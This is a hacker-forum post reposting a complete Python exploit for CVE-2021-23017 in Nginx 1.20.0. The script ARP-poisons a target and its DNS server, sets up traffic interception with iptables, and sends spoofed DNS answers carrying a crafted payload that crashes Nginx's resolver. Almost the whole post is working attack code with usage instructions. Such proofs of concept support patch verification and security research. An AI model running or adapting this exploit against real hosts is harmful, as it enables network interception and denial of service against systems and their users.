Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Nginx 1.20.0 - Denial of Service (DOS)

 Share


Recommended Posts

# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
# Date: 2022-6-29
# Exploit Author: Mohammed Alshehri - https://Github.com/M507
# Vendor Homepage: https://nginx.org/
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
# Version: 0.6.18 - 1.20.0
# Tested on: Ubuntu 18.04.4 LTS bionic 
# CVE: CVE-2021-23017
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
# The service needs to be configured to use Nginx resolver

from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os

def device_setup():
    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")

def ARPP(target, dns_server):
    print("[*] Sending poisoned ARP packets")
    target_mac = getmacbyip(target)
    dns_server_mac = getmacbyip(dns_server)
    while True:
        time.sleep(2)
        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)

def exploit(target):
    print("[*] Listening ")
    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)

"""
RFC schema
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|             LENGTH            |               ID              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ANCOUNT            |            NSCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ARCOUNT            |               QD              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AN              |               NS              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AR              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fig. DNS                             

"""
def process_received_packet(received_packet):
    if received_packet[IP].src == target_ip:
        if received_packet.haslayer(DNS):
            if DNSQR in received_packet:
                print("[*] the received packet: " + str(bytes_hex(received_packet)))
                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
                try:
                    # \/    the received DNS request
                    dns_request = received_packet[DNS].build()
                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
                    payload = [
                        dns_request[0:2],
                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
                        dns_request[12:null_pointer_index+1],
                        dns_request[null_pointer_index+1:null_pointer_index+3],
                        dns_request[null_pointer_index+3:null_pointer_index+5],
                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
                    ]
                    
                    payload = b"".join(payload)
                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
                        payload)
                    print("[+] dns answer: "+str(hexlify(payload)))
                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))

                    sendp(spoofed_pkt, count=1)
                    print("\n[+] malicious answer was sent")
                    print("[+] exploited\n")
                except:
                    print("\n[-] ERROR")

def main():
    global target_ip
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="IP address of the target")
    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
    args = parser.parse_args()
    target_ip = args.target
    dns_server_ip = args.dns_server
    device_setup()
    processes_list = []
    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
    exploitProcess = Process(target=exploit,args=(target_ip,))
    processes_list.append(ARPPProcess)
    processes_list.append(exploitProcess)
    for process in processes_list:
        process.start()
    for process in processes_list:
        process.join()

if __name__ == '__main__':
    target_ip = ""
    main()
            

 

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...